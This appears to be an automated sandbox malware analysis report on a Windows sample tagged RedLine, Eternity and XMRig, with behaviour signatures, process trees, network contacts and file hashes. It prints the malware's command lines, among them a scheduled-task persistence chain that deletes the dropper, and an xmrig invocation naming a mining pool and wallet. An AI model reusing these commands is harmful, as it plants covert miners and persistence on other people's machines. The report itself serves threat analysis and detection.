Malware Analysis Report

2025-06-16 03:47

Sample ID 220904-kev3nafea4
Target 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA256 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
Tags
eternity redline xmrig installs-49 discovery infostealer miner spyware stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439 was found to be: Known bad.

Malicious Activity Summary

RedLine

Eternity

xmrig

XMRig Miner payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Program crash

Enumerates physical storage devices

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Analysis: static1

Detonation Overview

Reported

2022-09-04 08:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-04 08:31

Reported

2022-09-04 08:34

Platform

win10v2004-20220812-en

Max time kernel

170s

Max time network

171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe"

Signatures

Eternity

eternity

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Miner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 2108 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 3876 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2612 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2612 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2612 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 4524 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe

"C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe"

C:\Users\Admin\AppData\Local\Temp\Miner.exe

"C:\Users\Admin\AppData\Local\Temp\Miner.exe"

C:\Users\Admin\AppData\Local\Temp\installs49.exe

"C:\Users\Admin\AppData\Local\Temp\installs49.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2108 -ip 2108

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 1408

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

"C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

"C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_TMKNGOMU -p --max-cpu-usage=40 --donate-level=1

Network

Country Destination Domain Proto
US 93.184.220.29:80 - tcp
US 93.184.220.29:80 - tcp
LV 94.140.112.157:29329 - tcp
NL 104.80.225.205:443 - tcp
US 8.8.8.8:53 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet udp
US 198.251.83.154:80 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
NL 104.110.191.140:80 - tcp
NL 104.110.191.140:80 - tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp
FR 2.18.110.76:443 - tcp

Files

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

MD5 81ab0e59097e03cb04c32378024d6628
SHA1 cc2a7a335f905e787906b6a0820acfbd4c5d0ed2
SHA256 704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533
SHA512 3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8
